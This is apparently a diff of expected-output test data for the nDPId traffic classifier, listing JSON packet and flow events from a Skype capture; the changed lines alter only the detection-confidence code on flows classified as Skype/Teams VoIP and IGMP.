00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431969665006,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431969665006,"pkt":"PBXCt3IOxCwDBkn+CABGAAAgivAAAAEC9ufAqAFc4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} -00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969665006,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1431969665118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665118,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIgG7w31xB6fgd8Lh1qASOJDOhQAAAgQFrAQCCApOq7dsPiLjQgEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"skype.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1431969665118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665118,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0H2lAAEAGObLAqAEinTeCp8N9Abt3wuHWcQen4YAQECwlMAAAAQEICj4i48JOq7ds"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":50046,"dst_port":40011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9S9AAEAGY\/DAqAEinTeClsN+nEtADbnoAAAAALAC\/\/\/YlwAAAgQFtAEDAwUBAQgKPiLk6gAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1j8QAAEARCNrAqAEiQTffGDLdnGAAISuNnAoCfsB5JB\/rTYpH1Pyy3TEn61xOyU3n6Q=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"skype.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/Ev0AAEAR0ADAqAEinTc4rzLdnE0AK5vynAwCv2wYRcgby0Lpb\/j9BzqAbRO\/1tuxNgazREl3CBLvd3M="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0pwAAAEARuljAqAEiQAQXkjLdgQkAIJb3nA4CpT3k+\/yRRYMAziIEiKPZ4SNw4uYJ"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2ZQAAAEARfiTAqAEinTc4kTLdnFsAImkAnBACXCxecPPKFtdeUw7sQSBvp3gi9mq4vcM="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431969665416,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969665416,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+hGcAAEARenXAqAEib91KKzLdnEEAKumHnBICbsOSISjTImKbV\/UiCWod5a6w5EFlZL740jo5mcYkgQ=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969665416,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1431969665632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969665632,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYiSdN4KWwKgBIpxLw35DcUQuQA256aASOJA7FQAAAgQFrAQCCApOt5+TPiLk6gEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"skype.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1431969665632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969665632,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tVZAAEAGo9XAqAEinTeClsN+nEtADbnpQ3FEL4AQECyRaAAAAQEICj4i5cFOt5+T"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QwsAAEARVYDAqAEiQTffLDLdnE0AIF\/DnBQCMyjz3r9eJ18XTFVNiAvxrYpQ3ucg"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"skype.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.44","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA82TgAAEARDlzAqAEinTg0GjLdnFoAKNB4nBYCAAvRN+bFqY3YyxruA93YXf9Qo41EFxKazlLBv\/8="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/\/94AAEARYWbAqAEiQAQXmzLdnEQAK4rqnBgCdE2WfHkd94c\/GZASHmkYP3mRsrUzW7aH679XKkCN7wg="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1431969666429,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969666429,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3cPYAAEARJ5XAqAEiQTffKTLdnFsAIyQanBoCqUIPvRhVKRfli2TsAPxez+o30kiStRum"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"skype.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.41","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969666429,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 